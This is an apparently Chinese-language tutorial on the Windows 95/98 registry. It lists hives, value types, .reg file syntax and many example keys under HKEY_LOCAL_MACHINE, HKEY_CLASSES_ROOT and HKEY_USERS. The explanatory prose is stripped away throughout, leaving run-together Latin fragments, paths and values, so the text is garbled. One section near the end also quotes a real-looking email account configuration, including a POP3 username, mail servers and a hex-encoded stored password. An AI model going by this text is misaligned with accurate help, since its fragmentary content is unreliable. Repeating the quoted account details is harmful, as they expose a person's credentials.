1
PCWin3.x.iniINIINI
Windows95Windows
INI
1.
2.
3.
4.
1.
2.WindowsWindows
3.
Windows?Windows2000cRegedt32Windows
WindowsRegedt32RegeditRegedt32.exe
2
Windows(Registry)
WindowsSystem.datUser.datwindowsSystem.datUser.dat
Windows(Regedit.exe)
""HKEY(KEY)(SubKEY)(value)(valueName)(valueData)
HKEY-CLASSES-ROOTOLE
HKEY-CURRENT-USER
HKEY-LOCAL-MACHINE
HKEY-USERS
HKEY-CURRENT-CONFIG
HKEY-DYN-DATA
1.
255"a"="***"
2.
"a"=hex:01,00,00,00
3.DWORD
DWORD32(4)"a"=dword:00000001
WindowsWindows
WindowsSystem.datSystem.da0User.datUser.da0Windows
2
1Windows(Regedit.exe)
Regedit.exe-->*.reg
2Win95Other\Misc\ERU\ERU.EXE(EmergencyRecoveryUtility)
WindowsSystem.datUser.datSystem.da0User.da0Regedit.exeWindowsDOS.regERU.EXE
c:\System.1stWindowsSystem.dat
1.()
MagicSetTweakUIWinHacker
2.()
.reg.reg
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\SuperRabbit\MagicSet]
"@"="SuperRabbitMagicSetForWindows98V2.92"
"a"=dword:00000001
"b"=hex:02,05,00,00
[HKEY_LOCAL_MACHINE\Software\SCC\QuickViewer]
REGEDIT4
[]HKEY_LOCAL_MACHINE\Software\SuperRabbit\MagicSet
@""
.reg
3.()
()
3
WindowsHKEYAPIWindowsAPIforWindows
Windows
HKEY_CURRENT_USERSKeyboardLayoutAttributesREG_DWORD:0REG_DWORD0
ControlPanel
(BINARY)
CustomColors
DWORD(DWORD)
DWORD324DWORDDWORD
(SZ)
Win.iniSystem.ini.ini
RegEditRegEdt32
WindowsNTRegEdt32
REG_UNKNOWN
REG_BINARY30~
REG_COLOR_RGB*4
REG_DWORD44DWORD
REG_DWORD_BIG_ENDIAN54DWORD
REG_DWORD_LITTLE_ENDIAN44DWORD
REG_EXPAND_SZ20~
REG_FILE_NAME*0~
REG_FILE_TIME*
REG_FULL_RESOURCE_DESCRIPTOR9
REG_LINK60~(symboliclink)Unicode
REG_MULTI_SZ70~nullnull
REG_NONE0REG_NONEREG_UNKNOWN
REG_RESOURCE_LIST8
REG_RESOURCE_REQUIREMENTS_LIST10
REG_SZ10~null
REG_UNKNOWN
4
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\SoftwareSoftware
HKEY_CURRENT_USER\Software\RegisterNewInfoREG_SZ
Y
(Y)
5
HKEY_LOCAL_MACHINE
director(F)
Windows
(U)(D)(W)(C)
Regedt32Rededit32Regedt32Regedt32
(F3)
Regedt32
ON/OFF0/1DWORD
HKEY_CURRENT_USER\ControlPanel\KeyboardKeyboardDelayKeyboardSpeed
KeyboardDelay:REG_SZ:1
13
6
RegeditRegedt32
Regedt32
REG
TXTWindwos
.NEWUSER
(Y)
7HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINWindows
HKEY_LOCAL_MACHINE
HARDWARE
HARDWAREDEVICEMAPDESCRIPTIONDEVICEMAP:
HKEY_LOCAL_MACHINE\HARDWARE
HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP
HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\SERIALCOMM
HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\SERIALCOMM
*COM1=COM1COM1
*COM2=COM2COM2
DESCRIPTION
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0
*SAM
*SECURITY
*SOFTWARE
*SYSTEM
SystemCurrentControlSetCurrentControlSetControlServices
Control
(1)fontassoc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\fontassocAssociatedDefaultFontsAssociatedCharSet
AssociatedDefaultFonts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\
fontassoc\AssociatedDefaultFonts
*AssocSystemFont=simsun.ttfsimsun.ttfTrueType
*FontPackageDontCare=FontPackage
Win3.xWifeman.ini[FontPackages]
*FontPackageRoman=
*FontPackageSwiss=
*FontPackageModern=
*FontPackageScript=
*FontPackageDecorative=AssociatedCharSet
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\fontassoc\Associated
CharSet
(2)Nls
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\NlsWindowsEUDC
(3)SessionManager
KnownDLLs
Windows32Dll
CheckBadApps
16WindowsPPower.exeMSDOS6.xHKEY_LOCAL_MACHINE\System\CurrentControlSet\control\SessionManager\CheckBadApps\POWER.EXE
CheckBadApps400
32
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\
SessionManager\CheckBadApps400
UltraEdit3232Ui32.exeHKEY_LOCAL_MACHINE\System\CurrentControlSet\control\SessionManager\CheckBadApps400
\UE32.EXEUi32.exeUi32.exe
AppPatches
Windows
Windows3.x
Win.iniHKEY_LOCAL_MACHINE\System
\CurrentControlSet\control\SessionManager\AppPatchesSetup
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\
SessionManager\AppPatches\SETUP
(4)MediaResources
HKEY_LOCAL_MACHINE\System\
CurrentControlSet\control\MediaResourcesDirectSound
JoystickMIDINonGeneralMIDIDriverList
(5)MediaProperties
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\Media-
Properties
(6)FileSystem
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\FileSystem
WindowsNTFSWin31Win9.x
(7)Shutdown
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\ShutdownWindows
(8)keyboardlayouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\keyboardlayouts
WindowsKeyboardLayouts
(9)Update
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\Update
(10)TimeZoneInformation
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\
TimeZoneInformation
(11)Print
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\Print
(12)IDConfigDB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\IDConfigDB
(13)ComputerName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\
ComputerName\ActiveComputerName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\ComputerName\ComputerName
(14)SecurityProviders
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\
SecurityProviders
Services
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServicesWindows
(1)Class
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ClassWindows
1394
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class1394IEEE13941394*@=13941394
*Icon=-21
*Link={6BDD1FC1-810F-11D0-BEC7-08002BE2092F1394{6BDD1FC1-810F-11D0-BEC7-08002BE2092F
{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}1394
*Link=13941394
*Class=139413941394
Adapter
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Adapter
CD-ROM
*@=CD-ROM
*Icon=-9
*Link={4d36e964-e325-11ce-bfc1-08002be10318}CD-ROM{4d36e964-e325-11ce-bfc1-08002be10318}
{4d36e964-e325-11ce-bfc1-08002be10318}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\{4d36e964-e325-11ce-bfc1-08002be10318}CD-ROM
*Link=AdapterAdapter
*Class=AdapterAdapter
Printer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Class\Printer
*@=
*Installer=MSPRINT.DLLMSPRINT.DLL
*Icon=-4
*NoDisplayClass=110
*Link={4d36e979-e325-11ce-bfc1-08002be10318}
MEDIA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class
\MEDIA
*@=
*Link={4d36e96c-e325-11ce-bfc1-08002be10318
{4d36e96c-e325-11ce-bfc1-08002be10318}
*Icon=0
*Installer=mmci.dllMMCI.DLL
(2)VxD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxDWindowsWindows
Winsock
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\WinsockWinSock*IrSockets=wsirda.vxd
Winsockwsirda.vxd
VNETSUP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\VNETSUP
*ComputerName=caogjwj
*Workgroup=cgj
*Comment=CAOGUOJUN
*StaticVxD=vnetsup.vxdvnetsup.vxd
*Start=hex:00
*NetClean=hex:010100
*MaintainServerList=2
*LMAnnounce=0LMLMAnnounce
Ndi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\VNETSUP\Ndi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\VNETSUP\Ndi\params
paramsLM
a.MaintainServerList
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD
\VNETSUP\Ndi\params\MaintainServerListWindowsnetview
*default=22
*ParamDesc=
*type=enum
*@=22
enumenum
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\VNETSUP\Ndiparams\MaintainServerList\enum
*2=
*1=
*0=
b.LMAnnounce
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\VNETSUP\Ndi\params\LMAnnounceLMLMLANManager
*default=00
*ParamDesc=LM
*type=enum
*@=00
enumenumHKEY_LOCAL_MACHINE\System\
CurrentControlSet\Services\VxD\VNETSUP\Ndi\params\LMAnnounce\enum
*1=LANManager
*0=LM,
NDIS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\NDISNIDS
*Start=hex:0000
*NetClean=hex:01
*StaticVxD=ndis.vxd,ndis2sup.vxdndis.vxdndis2sup.
vxd*DeviceVxDs=ndiswmi.sysNIDSndiswmi.sys
JAVASUP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\JAVASUPJAVASUPJava
*Start=hex:0000
*StaticVxD=JAVASUP.VXDJAVASUP.VXD
CONFIGMG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\CONFIGMG
*StaticVxD=*CONFIGMG*CONFIGMG
*Start=hex:0000
*SysDM=SYSDM.CPLSYSDM.CPL
*SysDMFunc=DMSetupDevnodeDMSetupDevnode
*Detect=SYSDM.CPLSYSDM.CPL
*DetectFunc=DMRedetectDMRedetect
*Private=SYSDM.CPLSYSDM.CPL
*PrivateFunc=DMPrivateProblemDMPrivateProblem
*RemoveRomOkay=SYSDM.CPLSYSDM.CPLROM
*RemoveRomOkayFunc=DMRemoveRomOkayDMRemoveRomOkayROM
*AskForConfig=SYSDM.CPLSYSDM.CPL*AskForConfigFunc=
DMAskForConfigDMAskForConfig
*AskForUndock=SYSDM.CPLSYSDM.CPL
*AskForUndockFunc=DMAskForUndockDMAskForUndock
CONIFGMG
a.SpannableBus
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\CONFIGMG\SpannableBusSpannableBus
*PCI=hex:00PCI
*ISAPNP=hex:00ISA
b.PnPBus
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\CONFIGMG
\PnPBusPnPBus
*PCI=hex:00PCI
*BIOS=hex:00BIOS
*EISA=hex:00EISA
*USB=hex:00USB
*HID=hex:00HID
*1394=hex:001394
*ISAPNP=hex:00ISAPNP
*MF=hex:00MF
*ACPI=hex:00ACPI
NTKern
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\NTKernNTKern
*StaticVxD=*NTKERN*NTKERN
*Start=hex:00
(3)WinSock
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinsockInternetWinSock
Autodial
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Winsock\AutodialAutodial
*AutodialDllName32=wininet.dll32DLLwininet.
dll
*AutodialFcnName32=InternetAutodialCallback
Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Winsock\ParametersWinSock
*MSTCP=HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\MSTCP\Parameters\WinsockWinSock
(4)WDMFS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WDMFSWDMFSWDM
*ImagePath=\\SystemRoot\\System32\\Drivers\\wdmfs.sysWDMFSwdmfs.sys
*ErrorControl=hex:01,00,00,00
*Start=hex:00
*Type=hex:01,00,00,00WDMFS
*DisplayName=WDMWindowsFileSystemMapperWDMFS
(5)UPDATE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UPDATEUPDATE
*ImagePath=\\SystemRoot\\System32\\Drivers\\update.sysUPDATEupdate.sys
*ErrorControl=hex:01,00,00,00
*Start=hex:00
*Type=hex:01,00,00,00UPDATE
*DisplayName=IntelUpdateDriverUPDATE
(6)RemoteAccess
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServicesRemoteAccessWindows
*Version=1.2c
*RemoteConnection=hex:00,00,00,00
Authentication
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
\RemoteAccess\Authentication
NetworkProvider
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServicesRemoteAccess\NetworkProvider
(7)MSNP32
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MSNP32
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MSNP32
\NetworkProviderNetworkProviderMicrosoft
*GroupFcn=GROUPPOL.DLL,NTGetUserGroupsGROUPPOL.DLLNTGetUserGroups
*AuthenticatingAgent=
*LogonDisconnected=hex:00,00,00,00
*Name=MicrosoftNetwork
*ProviderPath=msnp32.dllMicrosoftmsnp32.dll
*Description=MicrosoftNetworkMicrosoft
*NetID=hex:00,00,01,00
*CallOrder=hex:00,00,00,40
(8)NWNP32
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP32
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP32
\NetworkProviderNetworkProviderMicrosoftNetware
*GroupFcn=GROUPPOL.DLL,NWGetUserGroups:GROUPPOL.DLLNWGetUserGroups
(9)Arbitrators
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Arbitrators
DMAI/O
IRQArb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Arbitrators
\IRQArb
DMAArb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Arbitrators
\DMAArbDMA
AddrArb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Arbitrators
\AddrArb
IOArb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Arbitrators
\IOArbI/O
(10)WinSock2
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2
InternetWinSock2.0
Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2
\ParametersWinSock2.0
Providers
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2
\ProvidersWinSock2.0
INET
(11)wdmaud
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\wdmaud
WDMAudioWDM
*Group=BaseWDMAudio
*ImagePath=\\SystemRoot\\system32\\drivers\\wdmaud.sysWDMAudio
wdmaud.sys
*Start=hex:03,00,00,00
*Type=hex:01,00,00,00
*ErrorControl=hex:01,00,00,00wdmaud
redbooksbemulswmidi
(12)NPSTUB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NPSTUB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NPSTUB\NetworkProviderNetworkProviderMicrosoft
*Name=Microsoft
*ProviderPath=ienpstub.dll32ienpstub.dll
*RealDLL=mslocusr.dllDLLmslocusr.dll
*Description=Microsoft
*NetID=hex:00,00,01,00
*CallOrder=hex:00,00,00,4013)ProtectedStorage
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\ProtectedStorageProtectedStorage
ParametersHKEY_LOCAL_MACHINE\
System\CurrentControlSet\Services\ProtectedStorage\Parameters
*ImagePath=C:\\WINDOWS\\SYSTEM\\PSTORES.EXE
PSTORES.EXE
*AuthCodeCfg=dword:00000001
*Configuration=dword:00000001
ParametersSHKEY_LOCAL_MACHINE
\System\CurrentControlSet\Services\ProtectedStorage\Parameters\Spstores.exepsbase.dll
*pstores.exe=hex:13,ff,e7,bb,a3,f2,01,1e,87,.......pstores.exe
*psbase.dll=hex:d0,08,ef,10,2b,bf,b2,f2,23,.......psbase.dll
(14)WebPost
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WebPost
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WebPost\Providers
ProvidersInternetMailOutlookExpress
8HKEY_CLASSES_ROOT
WindowsHKEY_CLASSES_ROOTHKEY_CLASSES_ROOT
.386vxd.ADMADM_auto_
.aiapplication/postscript.aifaiff
.aifcaiff.aiffaiff
.aniani.artart
.auauInternet.awdFaxView
.sndau.aviaviVideoforWindows
.batbat.bfcBriefcase
DOSWindows
.bmpPaint.picture.cdacda
.cnfConferencelink.crtcertificate
.dercertificate.clpClipboard
.cmdcmd.comcomDOS
Windowscommand.comwin.co
.cplcpl.csstext/css
.curcur.datDAT_auto_
.dcxDCXImage.DocumentDCXImage.DICTxt
.dlldll.shbDocShortCut
WindowsDOC
.drvdrvWindows.xlaEXCEL.Addin
.xlkExcel.Backup.xlcExcel.Chart.5
.csvExcel.CSV.xldExcel.Dialog
.difExcel.DIF.xlbExcel.Sheet.5
.xlsExcel.Sheet.5.slkExcel.SLK
.xltExcel.Template.xlvExcel.VBAModule
.xlwExcel.Workspace.xllExcel.XLL
.xlmExcel.Macro.Sheet.xifXIFImage.Document
XIFImage
.exeexeDOSWindows.fndfnd
.fonfonWindowsTTF.gifgif
.gocgocserve.hlphelpWindows
.htht.htmhtml
.htmlhtml.icoicoWindows
.infinf.iniiniWindows
.urlInternetShortcutInternetURL.jobJobObject
.jfifjpeg.jpejpeg
.jpgjpeg.lnklnkWindows
.midmid.mmmMPlayer
.mlvMPEG
.makmak
.manapplication/x-trof-man.MAPI
MailCLSID\{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE}
.mccDialer10CallingCard.movmovQuickTimefor
Windows
.mov
ievideo/x-sgi-movie.mp2MPEG
.mpaMPEG.mpeMPEG
.mpegMPEG.mpgMPEG
.msnMS.Network.Document
MSN.rmimid
.graMSGraph.Chart.5.grpMSProgramGroup
.obdOffice.Binder.95.obtOffice.Binder.Template
.obzOffice.Binder.Wizard.ofnOffice.File.NewOffice
.PBKMSN_PhoneBook.pcxPCXImage.Document
.nwsMicrosoftInternetNews
Message.pifpif
.pmaPerf.psapplication/postscript
.pmcPerf.pmlPerf
.pmrPerf.pmwPerf
.pfmpfm.pnfpnf
.queQueueObject.qtMOV
.raReadAudio.ramReadAudio
.regreg.rnkrnk
.rpmaudio/x-pn-realaudio-
plugin.rtfWord.RTF
.scrscr.shsShellScrap
.sitapplication/x-stuffit.syssys
.tifTIFImage.Document.tiffTIFImage.Document
.ttfttf.ttcttc
.EXCtxt.logtxt
.scptxt.txttxt
.picViewerFrameClass.virvir
.vsdVisio.Drawing.4.vssVisio.Drawing.4
.vstVisio.Drawing.4.vswVisio.Drawing.4
.wavwav.ARCWinzip
.ARJWinzip.gzWinzip
.LZHWinzip.tarWinzip
.tazWinzip.tgzWinzip
.zWinzip.zipWinzip
.wllWord.AddinwbkWord.Backup
.DOTWord.Template.wizWord.Wizard
.docWord.Document.wriwri
.xbmxbm(image/x-xbitmap).xifXIFImage.
Document
.ulsulstext/iuls.WHTWhiteboard
.WPSwps
HKEY_CLASSES_ROOT*bas++
*
*
HKEY_CLASSES_ROOT\*
HKEY_CLASSES_ROOT\*\shellex
HKEY_CLASSES_ROOT\*\shellex\PropertySheetHandlers
HKEY_CLASSES_ROOT\*\shellex\PropertySheetHandlers\{3EA48300-8CF6-101B-84FB-666CCB9BCD32}
*Windows
bas
.bas
HKEY_CLASSES_ROOT\.bas
HKEY_CLASSES_ROOT\.bas\shell
HKEY_CLASSES_ROOT\.bas\shell\open
HKEY_CLASSES_ROOT\.bas\shell\open\command
bascommandcommand
#@=E:\VB\vb.exe%1
basE:\VB\vb.exe
bmp
bmp
HKEY_CLASSES_ROOT\.bmp
HKEY_CLASSES_ROOT\.bmp\ShellNew
ShellNew
#NullFile=NullFile.bmp
9HKEY_CURRENT_CONFIG
WindowsHardware Configuration fileHKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
WindowsHKEY_LOCAL_MACHINE\ConfigHKEY_LOCAL_MACHINE\EnumHKEY_CURRENT_CONFIGHKEY_CURRENT_CONFIGHKEY_LOCAL_MACHINE\ConfigHKEY_LOCAL_MACHINE\Enum
WindowsWindowsWindowsWindowsWindows
10HKEY_CURRENT_USER
HKEY_CURRENT_USERHKEY_USERS\.Default
HKEY_CURRENT_USERHKEY_USERS\.Default
11HKEY_USER
AppEvents
HKEY_USERS.DEFAULTwsSoftware
HKEY_USERS\SoftwareHKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\.DEFAULTRemoteAccess
#AppEvents
#ControlPanel
#keyboardlayout
#Software
.DEFAULT
Control
ControlPanelHKEY_USERS\.DEFAULT\ControlPanelControlPanel
ControlPanelMouseWindows
ControlPanel
Accessibility
HKEY_USERS\.DEFAULT\ControlPanel\Accessibility
#KeyboardPreference=0
#BlindAccess=0
AccessibilityOn01
Appearance
HKEY_USERS\.DEFAULT\ControlPanel\Appearance
AppearanceScheme
Cursors
HKEY_USERS\.DEFAULT\ControlPanel\Cursors
Colors
HKEY_USERS\.DEFAULT\ControlPanel\Colors
Scrollbar=192192192RGB
desktop
HKEY_USERS\.DEFAULT\ControlPanel\desktop
Desktop
#DragFullWindows=001
#FontSmoothing=001
#Wallpaper=
#TileWallpaper=0
#ScreenSaveTimeOut=840840
#UserPreferencemask=hex:ae,00,00,00
#WallpaperStyle=0ActiveDesktop
#ScreenSaveLowPowerActive=00
#ScreenSavePowerOffActive=00
#CursorBlinkRate=500
#MenuShowDelay=400
#ScreenSaveActive=00
#ScreenSaveUsePassword=dword:0000000001
desktopWindowMetrics
HKEY_USERS\.DEFAULT\ControlPanel\desktop\WindowMetrics
#IconSpacingFactor=100
#ScrollWidth=-270
#ScrollHeight=-270
#IconSpacing=-1155
#IconVerticalSpacing=-1125
#IconFont=hex:09,00,00,00,00,00,00,00,90,01,00,00,......
#CaptionFont=hex:09,00,00,00,00,00,00,00,90,01,00,00,00,......
#MenuFont=hex:09,00,00,00,00,00,00,00,90,}01,00,00,00,00,......
#SmCaptionFont=hex:09,00,00,00,00,00,00,00,bc,02,00,00,......
#StatusFont=hex:09,00,00,00,00,00,00,00,90,01,00,00,00,86,00,......
#MessageFont=hex:09,00,00,00,00,00,00,00,90,01,00,00,00,86,00,......
#BorderWidth=-15
#CaptionWidth=-270
#CaptionHeight=-270
#SmCaptionWidth=-210
#SmCaptionHeight=-210
#MenuWidth=-270
#MenuHeight=-270
#ShellIconSize=323232
InputMethod
HKEY_USERS\.DEFAULT\ControlPanel\InputMethod
InputMethod
#ShowStatus=1
#ParallelDistance=hex:00,00,00,00
#PerpendicularDistance=hex:10,00,00,00
#ParallelTolerance=hex:38,00,00,00
#PerpendicularTolerance=hex:10,00,00,00
InputMethodHotKeys
HKEY_USERS\.DEFAULT\ControlPanel\InputMethod\HotKeysHotKeys1.5HKEY_USERS\.DEFAULT\ControlPanel\InputMethod\HotKeys\00000011
#KeyModifiers=hex:04,c0,00,00
#TargetIME=hex:00,00,00,00IME
#VirtualKey=hex:20,00,00,00L
International
HKEY_USERS\.DEFAULT\ControlPanel\International
Keyboard
HKEY_USERS\.DEFAULT\ControlPanel\Keyboard
keyboard
#KeyboardSpeed=31
#KeyboardDelay=0
Mouse
HKEY_USERS\.DEFAULT\ControlPanel\Mouse
Mouse
#MouseThreshold1=4
#MouseThreshold2=12
#MouseSpeed=2PowerCfg
HKEY_USERS\.DEFAULT\ControlPanel\PowerCfg
PowerCfg
#CurrentPowerPolicy=0/PowerPolicies
PowerCfg
(1)GlobalPowerPolicy
HKEY_USERS\.DEFAULT\ControlPanel\PowerCfg\GlobalPowerPolicy
#Policies=hex:01,00,00,00,06,00,00,00,03,00,00,00,00,......
(2)PowerPolicies
HKEY_USERS\.DEFAULT\ControlPanel\PowerCfg\PowerPolicies
0
HKEY_USERS\.DEFAULT\ControlPanel\PowerCfg\PowerPolicies\0/
#Name=/
#Description=#
#Policies=hex:01,00,00,00,02,00,00,00,01,00,00,00,00,00,......
1
HKEY_USERS\.DEFAULT\ControlPanel\PowerCfg\PowerPolicies\1/
#Name=/
#Description=
#Policies=hex:01,00,00,00,02,00,00,00,01,00,00,00,00,......
3
HKEY_USERS\.DEFAULT\ControlPanel\PowerCfg\PowerPolicies\3
#Name=
#Description=
#Policies=hex:01,00,00,00,00,00,00,00,01,00,00,00,00,00,......
Keyboard
HKEY_USERS\.DEFAULT\keyboardlayout
preload
HKEY_USERS\.DEFAULT\keyboardlayout\preloadPreload
Substitutes
HKEY_USERS\.DEFAULT\keyboardlayout\substitutes
Toggle
HKEY_USERS\.DEFAULT\keyboardlayout\toggle
Software
SoftwareHKEY_LOCAL_MACHINE\SoftwareMicrosoftNetscapeNavagiatorHKEY_LOCAL_MACHINE\SoftwareAdobeCorelAutodeskMicrosoftNetscapeNavagiatorWindowsMicrosoftInternetExplorer5.0NetMeetingFrontPageExpressWindows
Microsoft
HKEY_USERS\.DEFAULT\Software\MicrosoftMicrosoft
(1)InternetExplorer
HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorerInternetExplorer5.0
InternetExplorer
Main
HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\MainInternetExplorer5.0
(2)JavaVM
HKEY_USERS\.DEFAULT\Software\Microsoft\JavaVMJavaVM
#EnableJIT=hex:01,00,00,00JITJavaInternetToolbar
01,00,00,00JIT00,00,00,00JIT
#EnableLogging=hex:00,00,00,0001,00,00,0000,00,00,00
(3)Windows
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion
CurrentVersionWindows
Applets
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\AppletsJavaAppletsJava
Multimedia
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Multimedia
(4)OutlookExpress
HKEY_USERS\.DEFAULT\Software\Microsoft\OutlookExpressOutlookExpress
(5)ActiveSetup
HKEY_USERS\.DEFAULT\Software\Microsoft\ActiveSetup
HKEY_USERS\.DEFAULT\Software\Microsoft\ActiveSetup\InstalledComponents
ActiveSetupActiveSetupWindows
(6)Conferencing
HKEY_USERS\.DEFAULT\Software\Microsoft\Conferencing
HKEY_USERS\.DEFAULT\Software\Microsoft\Conferencing\UI
HKEY_USERS\.DEFAULT\Software\Microsoft\Conferencing\UI\Directory
DirectoryMicrososftNetMeetingURL
#Count=hex:09,00,00,009
(7)WebPost
HKEY_USERS\.DEFAULT\Software\Microsoft\WebPostWebPostWebFrontPageInternet
Logging
HKEY_USERS\.DEFAULT\Software\Microsoft\WebPost\LoggingWebPost
#LoggingDir=C:\\PROGRA~1\\WebPub~1
#WizardLogging=NoWebyesno
#WebPostLogging=NoWebPostyesno
FrontPageWPP
HKEY_USERS\.DEFAULT\Software\Microsoft\WebPost\FrontPageWPPFrontPageWebPostWebPostPage
(8)SystemCertificates
HKEY_USERS\.DEFAULT\Software\Microsoft\SystemCertificates
(9)InternetAccountManager
HKEY_USERS\.DEFAULT\Software\Microsoft\InternetAccountManagerInternetInternetAccountManager
#ServerID=dword:0000006b
#AccountName=dword:0000000c
#DefaultLDAPAccount=00000001LDAP
#DefaultMailAccount=00000008L
#DefaultNewsAccount=0000000b
AccountsAccounts0000000100000002LDAPLDAP0000000100000002......00000007LDAP00000008000000090000000a
0000000100000008LDAP
00000001
HKEY_USERS\.DEFAULT\Software\Microsoft\InternetAccountManager\Accounts\00000001SwitchBoard
#AccountName=SwitchBoard
#LDAPServer=ldap.switchboard.com
#LDAPAuthentication=dword:000000000
#LDAPTimeout=dword:000000033
#LDAPSearchReturn=dword:00000064
#LDAPServerID=dword:00000064
#LDAPResolveFlag=dword:00000000
#LDAPURL=http://www.switchboard.comURL
#LDAPPort=dword:00000185185
#LDAPSecureConnection=dword:000000000
#LDAPLogo=C:\\PROGRA~1\\COMMON~1\\Services\\swtchbrd.bmpSwitchBoard
#LDAPBindDN=dword:00000000BindDN0
#LDAPSimpleSearch=dword:000000000
AccountsLDAP
AccountsLDAPLDAPLDAPURL
00000
002Yahoo!PeopleSearchldap.yahoo.comHttp//www.yahoo.com/search/people/
00000
003Info
Spaceldap.infospace.comHttp://www.infospace.com
0000
0004Info
SpaceBusinessldapbiz.infospace.comHttp://www.infospace.com
00000
005Bigfootldap.bigfoot.comhttp://www.bigfoot.com
0000
0006WhoWhereldap.whowhere.comhttp://www.whowhere.com
0000
0007Verisigndirectory.verisign.comHttp://www.verisign.com
00000008
HKEY_USERS\.DEFAULT\Software\Microsoft\InternetAccountManager\Accounts\00000008
#AccountName=163.net
#ConnectionType=dword:00000002Internet
#Connectoid=CQ163
#POP3Server=pop.163.netPOP3
#POP3UserName=WanjiPOP3
#POP3Password2=hex:01,01,07,00,00,00,16,7f,7f,77,00,00,63POP3
#POP3UseSicily=dword:00000000SPA0
#SMTPServer=public.cta.gz.cnSMTPSMTP
#SMTPDisplayName=SMTP
#SMTPEmailmailto:[email protected]
Accounts
POP3
POP3
POP3SMPT
0000
0009
CQ
163Public.cta.gz.cnWanjihex:01,01,07,00,00,00,16,7f,7f,77,00,00,63
public.cta.gz.cn
000
0000a
263
NETpop.263.netWan
